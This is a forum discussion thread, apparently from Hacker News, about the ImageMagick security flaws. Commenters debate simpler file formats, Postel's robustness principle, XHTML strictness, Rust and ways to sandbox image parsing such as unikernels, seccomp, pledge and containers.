So, we get it. Complicated file and network formats, handled in C code leads to these types of security issues.
We are told that Rust will save us. Glib answer - if it was going to, it already would have (and this is from someone already writing Rust code).
I hope it will lead to a change on two fronts:
1. Simpler formats for file representation and data interchange. When someone tries to add an extra bitfield option, say no. When they keep trying, get a wooden stick with "no" written on it. Part of the disease of modern computing is bloated specs.
2. Restrictive not permissive code bases. Exit and bail out early. Tell the user "file corrupted". Push back.
> 1. Simpler formats for file representation and data interchange. When someone tries to add an extra bitfield option, say no. When they keep trying, get a wooden stick with "no" written on it. Part of the disease of modern computing is bloated specs.
How is creating new image formats and getting the entire Web to adopt them easier than making more secure image decoders?
It's especially irrelevant to this series of vulnerabilities, since they work by getting ImageMagick to parse less popular image formats. Inventing new ones won't do anything to mitigate these flaws.
> if it was going to, it already would have (and this is from someone already writing Rust code).
The 'Magick' in this case is less welcome when your system is pwned. Maybe less magic formats and tools will have, I don't know, less vectors for compromise.
We had better options before and after C, yet here we are. Not to piss on Rust's parade, but it may prove not to be the white knight of code hoped for. And I like Rust - I am probably just less emotionally clouded in my view point.
I agree to the extent that "Rust will save us" is a glib answer, but dismissing it completely is equally silly – safe-by-default is an excellent tool to help prevent many of the common sort of vulnerabilities we see in C code.
I don't really agree with the rest. "Simple file formats" is a theoretically nice idea which is impractical – after all, features are added to file formats for a reason. "Restrictive not permissive" is, as others have pointed out, a divergence from the generally useful Postel's law. Writing a library which cannot handle common problems in file formats – of which there are a huge number, due to sloppy implementation – is a good way to ensure you have developed a library which will be used by few.
>I agree to the extent that "Rust will save us" is a glib answer, but dismissing it completely is equally silly – safe-by-default is an excellent tool to help prevent many of the common sort of vulnerabilities we see in C code.
There have been all sorts of safe languages that are appropriate for image processing and other types of programs, but people apparently like programming in C more than they like secure software. It is hard to see how something like Common-Lisp/Ocaml/Haskell/Java/Eiffel/C#/Ada wouldn't be more than up to the task, with only a slight speed penalty. It seems more like a social issue than a technical one. Maybe Rust will finally be able to break through, but I wouldn't hold your breath.
Regarding point 2, I think we need to consider Postel's Law a design antipattern, rather than a hallmark of good design. From now on, good software should not be permissive in what it accepts, because there is no good way to guarantee that such permissiveness will not lead to security breaches down the line.
instead of old browsers that don't understand just throwing a fit and dying, they ignore stuff they don't understand and carry on. So we know that a browser which doesn't implement 'someprop: awesome-new-value' will go ahead and read 'someprop: boring-old-value' instead of stopping processing of the CSS, or worse, emitting an error and refusing to render the page altogether. Without this, it would effectively be impossible to ship new web features until old browsers had died off to <epsilon-of-users-we-don't-care-about>.
There's a crucial distinction to be made. Ignoring unknown properties is a defined part of the CSS spec, so implementing it that way is just being correct. Postel's Law leads to trouble when "being liberal" means unilaterally extending the spec in ill-defined and ultimately incompatible ways. Example: autocorrecting "awesome-new-value" to its closest known match "alternative-old-value".
I'll agree that Postel's Law should not be interpreted as "when something doesn't fit, force it". The most effective examples tend to have a duality: areas where permissiveness is allowed and areas where it's constrained. (E.g. The CSS/JSON must be well-formed, but the properties can vary.)
Getting underneath the patterns and anti-patterns of permissiveness in an informed way is a lot more useful IMO than the knee-jerk reaction of declaring all permissiveness harmful and running away. Especially in light of the web's incredible wins via this strategy.
From a purely financial point of view, you may well be right: the technical and social benefits of clean, elegant, reliable, correct software probably don't justify sacrificing something as profitable as the permissiveness of the Web.
But these are pretty damn twisted priorities. A little bit of social responsibility wouldn't hurt.
I would disagree with that greatly. Postel's law says there's no need to excessively constrain what's considered valid input, not to ignore basic bounds checking and security.
Not following Postel's law would result in brittle system components that break when other parts of the system evolve.
>Not following Postel's law would result in brittle system components that break when other parts of the system evolve.
This depends how much graceful degradation you have available to you. In systems/domains where little is available, following Postel's law can result in silent failures rather than explicit/loud ones. The question isn't whether they break or how brittle they are, but whether you will notice whether they did break. Each system exists within a range on a continuum of how acceptable Postel's law is.
Also, just because Postel's law worked for a small group of highly skilled systems programmers implementing common infrastructure for everyone, it doesn't automatically follow that it will work for a large and fast growing group of programmers of wildly varying skill, each implementing their own or their employer's brilliant business idea.
>Not following Postel's law would reult in brittle system components that break when other parts of the system evolve.
Being liberal in what you accept is precisely the definition of brittle: if there's an update that reduces the set of representable input data, but you keep the code that processes the user's input into data, then an untested, little-used edge case could invalidate your assumptions about the rest of the system.
Reply to sibling: “Did any browser reject poorly formed XHTML?” Yes, they did, if the XHTML was served with a MIME type of application/xhtml+xml.
However, this MIME type was extremely rare because MSIE would not show a web page unless the MIME type was text/html.
Furthermore, the extreme brittleness of XHTML was generally regarded as a Bad Move as one single URL in your source code with a literal ampersand instead of & would cause a complete and total breakage of your web page. Of course, many web pages are crummily concatenated strings and there are a lot of web devs who would never be able to reliably generate 100% XHTML-compliant output. Shit, pasting in a snippet of HTML where the BR tags omitted the self-closing slash would break your XHTML validation.
>Did any browser ever reject a Web page just because it wasn't well-formed XHTML?
Of course. If you served XHTML properly (by setting "application/xhtml+xml" MIME type), ill-formed XHTML would just show you a big syntax error instead of the page. Try it, that's still the case.
Even when being well-formed, lots of sites still used "text/html" type to trigger HTML (SGML) parser instead of XML one, as any 3rd party code embedded into the website would of course crash the page as well.
That was one of the reasons why XHTML never got popular and eventually has been abandoned.
That still wasn't serious enough. All it took to get browsers to accept non-XHTML pages was to change the MIME type. What I'm talking about is simply not displaying ill-formed pages at all, under any circumstances.
But with that MIME type it wasn't XHTML at all. It was being parsed as HTML which was possible only because of big similarity between those two formats. All you need to ensure the behavior you want is to disable HTML parsing (which is pretty much ensures being liberal in what the parser accepts already in its specification).
And this is precisely the point. If the very earliest browsers had insisted on correctness rather than permissively accepting broken HTML (and JS - see semicolon insertion), we would not now have a situation where browsers need to do a ton of work to allow graceful degradation in the face of awful markup, simply because the tooling would have evolved in the other direction. Postel's Law gains a little temporary sender convenience in exchange for a nasty mess of permanent receiver headaches.
Postel's law has two parts. Be gracious in what you receive is what most people are talking about, but be cautious in what you send is just as important. If people are using broken markup that's the problem that needs fixing. How many web devs bother with validation anymore? (And not for app like functionality, but for what should be simple text and images with a few menus - why are so many newspaper websites so awful?)
2.10. Robustness Principle
TCP implementations will follow a general principle of robustness: be
conservative in what you do, be liberal in what you accept from
others.
The problem is that being conservative and precise isn't enough. You and I can both be conservative, but disagree on the specifics (given an ambiguous spec, for instance). A permissive receiver of both our data now has to support both sides of our disagreement forever.
They do if they have any competition. Browsers are the perfect example here: a browser which responds to broken HTML by not working, but not exploding either, is going to lose out to one which does work. That means market forces pin the disagreement in place.
> but be cautious in what you send is just as important.
How are you going to enforce this for everyone?
> TCP implementations will follow a general principle of robustness (...)
This rule has worked well for TCP implementors in large part because of their circumstances, which are very different from those of browser implementors and Web developers:
(0) Priorities: How much do the following desiderata matter to each group: reliability, performance, new features?
(1) Skill: What skills does a representative programmer from each group have?
(2) Risk profile: How does each group cope with the possibility of design and implementation errors? How much technical debt are they willing to take?
I'd contend that Postel's law doesn't scale beyond relatively small groups of highly skilled programmers, for whom reliability is paramount and trumps all other considerations.
Exactly. So by being permissive from the start we now have this dumpster fire that prevents us from writing sane and performant code. Because we have to assume that with crap input the user doesn't want
Imagine what C++ would look like if all compilers had to accept all different variations of it, and the result of compiling 100 almost valid C++ files should, as far as possible, be a program that runs in some sense.
Most of the web pages I have ever written have probably been ill-formed because browsers don't tell me what's wrong, and instead show me a (nearly) working web page.
> Imagine what C++ would look like if all compilers had to accept all different variations of it, and the result of compiling 100 almost valid C++ files should, as far as possible, be a program that runs in some sense.
C++ is still a lot more permissive than it could and should be.
> Most of the web pages I have ever written have probably been ill-formed because browsers don't tell me what's wrong, and instead show me a (nearly) working web page.
Same here. The idea that JavaScript ought to be permissive and forgiving because its target audience doesn't know what they're doing turned out to be a self-fulfilling prophecy on the part of its designers.
It would be a lot more sensible than you think. When I get a compilation error, what I do is take a breath, think about the meaning of my code, correct any logical mistakes I can find, and try to compile again. Why couldn't Web developers do the same?
Also, there's no need to crash the tab. The browser could simply stop running any JavaScript, and leave the user with a static page.
IIRC some of the older versions of internet explorer did something like that, showing the user a popup if an error happened and asked them if they wanted to keep going.
The solution I've been experimenting with is to run this sort of code in an isolated, network-stack-free unikernel environment.
Imagine that you've built the ImageMagick library into a unikernel server using a virtio serial port for I/O. When you need to process an image, you boot a VM with this imagemagick kernel, then pipe the image data through its virtual serial port. Data goes in, data comes out...
And if the attacker manages remote code execution inside the VM, who cares? There's nothing in there. There's no network stack, there's no access to storage, there's no access to other processes; all you give this VM is the RAM and serial port the unikernel needs to do its job.
Or... you could just run it as nobody and maybe unshare its network and chroot it and not add the surface area of some virtio driver to your stack?
Like, there's no magic to a unikernel. It's just a process in a jail, unless you're legitimately running it directly on the cpu. Adding more layers of abstraction does not inherently add security.
It's the removal of abstraction layers which appeals to me. Why secure the kernel syscall interface when you can remove it? The hypervisor will be a potential attack surface anyway, so it's not a new point of vulnerability.
Sure, it's just a different kind of jail, but I'd rather start with a jail that is empty by default and add selected features to it when I'm convinced they're safe, than start with an ordinary apartment and remove things from it until I think it's secure enough to function as a jail cell.
I think the difference is that that seems like something I would screw up. I know how to make a $5 DigitalOcean instance that only has ImageMagick that I can pipe photos to and from. I don't trust myself to unshare the network from some running process without leaving other holes.
There are all these gotchas when you have stuff running in the same OS and it just takes one little mistake and your adversary has root.
I'm... very skeptical that it's trivial to make a $5 DO instance you can pipe imagemagick to from another host and has nothing else on it. Note that if you're talking about using a linux image, this is not even remotely a unikernel.
Also, there are still myriad ways this kind of interface can represent an attack surface if you aren't sufficiently careful with the communication protocol (that presumably you are writing).
How is "There are all these gotchas when you have stuff running in the same OS and it just takes one little mistake and your adversary has root" not saying that the Unix security model is too hard to use?
"seccomp()" (old simple mode) does pretty much this but much more simply and efficiently - disallows all system calls except read() and write() to existing file descriptors, and exit() and sigreturn().
With containers I already get such security. For example, I can run ImageMagic binaries inside a container with no network, no capabilities and minimal syscall interface. The attack surface of such setup is not particularly larger than hypervisor interface but performance is much closer to that of native executable.
I think before #1, #2, or Rust, we need a better "libsandbox". You don't even need containers to do this -- DJB showed how to do this with Unix over a decade ago [1]. See section 5.2: isolating single source transformations.
I think the reason people don't do this is because it's extremely platform-specific. Most of this C code runs on Windows too (ImageMagick, ffmpeg, etc.)
And it's complicated. But if there were a nice library to do all this stuff, I think people would use it.
If you're just shelling out to command line tools like ImageMagick, you don't even have to change any C code... you can just run it under a wrapper (sorta like systemd-nspawn). But I think most people are not using ImageMagick that way -- they are using a Python/Ruby binding, etc.
But it can still be done -- it just takes a little effort. MUCH less effort than changing any of that old crufty code, much less rewriting it in Rust!
This kind of problem is inherent to the Unix model of processes communicating by passing byte streams around. The way to solve it properly would be to make the process command interface something more structured (e.g. thrift/protobuf), so that rather than shelling out to wget --whatever and hoping you've escaped it correctly you'd pass an actually structured command.
The process command interface is more structured! You don't have to go through /bin/sh and worry about escaping. You could call exec. Ok, so you'd still have to worry about sticking "--" before the URL, but that's easy. No more worries about quoting.
Of course, chaining multiple commands together is a pain, and that's what the shell is good at, but then it is hard to get the quoting right. So a more structured shell interface. There's libpipeline, but I haven't used it to comment on.
But images and videos are byte streams already... The security boundary is often the network, where things are serialized anyway. The whole point is to sandbox the deserialization only, which has a large attack surface due to complex conditionals and string handling.
The rest of the application will need to run with privileges to actually do the stuff you care about, like display things to your screen and so forth.
> But images and videos are byte streams already...
Right, but the reason for this bug (and many others) is the mingling of the data bytestream and the command channel (the arguments for the call to wget).
> The whole point is to sandbox the deserialization only, which has a large attack surface due to complex conditionals and string handling.
I don't think that would help. Your sandboxed deserializer deserializes the video file into an inert datastructure. But then you go to system() to wget based on that datastructure and you're pouring commands and data into a flat stream. That architecture won't stop you from parsing a bunch of unix commands as image bytes and then passing those "image bytes" on the command line.
DJB maybe is a prominent cryptographer, but his code and security practices,
especially around Qmail, are simply atrocious. I wouldn't quote him for
anything that touches real C code.
Can you elaborate on this? I have never thought of "atrocious" when someone mentioned the history of vulnerabilities in djb's software. Depending on how egregious these security practices are there could be a $500 check in it for you.
Oh yes, because denying that your code has a vulnerability counts as a good
security practice.
You know why this MTA has that low count of published bugs? Because nobody
uses it anymore, so nobody looks at its code (and now factor in the ugliness
of the code itself, which lowers the eagerness to look at the code even more).
It's not because the code is (magically?) better.
One file per C function is an old practice you can still see in many libc implementations and in other pieces of code designed to be used as a static library. Since a traditional Unix static library is nothing but an archive of .o files, and a traditional Unix linker makes its include-or-omit decisions on the granularity of an .o file, putting each function in a separate source file maximizes the linker's ability to strip unused functions out of a static library.
> So, we get it. Complicated file and network formats, handled in C code leads to these types of security issues.
Actually, the magic byte thing makes me think this is a content sniffing issue, and the RCE might be due to a "feature". Rust won't help or, at best, would make it more awkward to exploit.
A capability-based (i.e. memory-safe, no accessible globals that can induce side effects) system would mitigate this, though. If I call out to ImageMagick and say "rescale this image", ImageMagick should not be able to initiate network requests in response.
> Check out OpenBSD's pledge, it's addressing precisely this problem.
Au contraire.
You can fork(), restrict yourself to a couple of pipes in a subprocess, pledge(), do the calculation in the subprocess, and exit the subprocess. It'll work, and it'll be slow. But this isn't at all specific to pledge() -- seccomp can do exactly the same thing, arguably more simply. Performance will suck either way.
<rant>I have yet to see a credible argument for how pledge() is better than seccomp. You could almost implement pledge() as a library function that uses seccomp, and the I consider the one part of pledge (execve behavior) that this won't get right to be a misfeature in pledge<./rant>
The performance of that scheme will be abysmal for anything that does very fine-grained sandboxing. What you want is language support. E (erights.org) does this as a matter of course. Rust and similar languages could if they were to allow subsetting of globally accessible objects. Java and .NET tried to do this and fell utterly flat.
I've considered trying to get a nice Linux feature to do this kind of sandboxing with kernel help (call a function that can only write to a certain memory aperture without the overhead of forking every time), and maybe I'll get this working some day.
There are several differences, eg pledge is not inherited by exec, while seccomp is. Also seccomp is vastly more complex and it is not really possible to filter by eg filename, so you need additional tools.
You'd set the library's code and data pages to protection key 1, along with the page containing a library access trampoline, leaving the rest of the address space with protection key 0. You'd call into the library through the trampoline, which would revoke access to protection key 0, call into the library, then restore access to key 0.
That's a whack-a-mole approach that doesn't even try to define a real security boundary. It will catch the most common errors, sure, but it's not a long-term solution.
> If I call out to ImageMagick and say "rescale this image", ImageMagick should not be able to initiate network requests in response.
Impossible in the world where programmers routinely cram together networking
and file transformations without any regard for whether the operation belongs
there or not (build systems that on `compile' command download random things
from internets; even Rust's build system does such a dumb thing by downloading
rustc after running an hour-long LLVM compilation, instead of failing before
doing anything).
So the way to prevent robots from throwing people of a cliff is to use a capability system that only allows robots to kill people when explicit authorized?
Is it not just improper shell escaping? You could do that incorrectly in any language. If you're not quoting | and ` and stuff correctly when you call system() you're doomed no matter the language.
qmail has already been pointed to elsewhere in this discussion. One of the qmail security principles, which are fast approaching 20 years old, is the maxim: Don't parse. This is directly applicable here.
The GNKSOA-MUA comes to mind, too. The other vulnerabilities (there being five -- see the mailing list message) are related to the idea of allowing input data files to contain embedded actions and commands to be executed by the data processing tool. In the world of mail there were many variations on this theme. Clifton T. Sharp Jr's Usenet signature was "Here, Outlook Express, run this program." "Okay, stranger.".
from googling and looking at the source this looks like it has nothing to do with c, its more of a logic error where a handler delegates control to another process, curl for example, based on image type. I could be wrong but thats what it looks like to me.
> 1. Simpler formats for file representation and data interchange. When someone tries to add an extra bitfield option, say no. When they keep trying, get a wooden stick with "no" written on it. Part of the disease of modern computing is bloated specs.
> 2. Restrictive not permissive code bases. Exit and bail out early. Tell the user "file corrupted". Push back.
It is really interesting that the techniques needed to achieve these security goals (theory of grammars) is one of the oldest and best explored areas of computer science.
I've been writing Rust too, but I'm not why the argument that it'll reduce the attack surface is glib. It can't prevent all security holes, though, because nothing can.
1. is not applicable even in mid-term, unless you want to break the internet
2. is breaking the internet
I'm not sure I'm ready to accept the collateral damage of your solutions.
How about looking at "C" (or any other language with direct memory access) as the culprit? (EDIT: Assuming it's a C-issue after all and not just some dumb input validation problem.)
Hopefully it will convince developers to not trust the client and actually confirm the user uploaded a .jpg, .png or .gif. But I guess that isn’t nearly as useful for us when we want a reason why we need to rewrite everything. :)
We are told that Rust will save us. Glib answer - if it was going to, it already would have (and this is from someone already writing Rust code).
I hope it will lead to a change on two fronts:
1. Simpler formats for file representation and data interchange. When someone tries to add an extra bitfield option, say no. When they keep trying, get a wooden stick with "no" written on it. Part of the disease of modern computing is bloated specs.
2. Restrictive not permissive code bases. Exit and bail out early. Tell the user "file corrupted". Push back.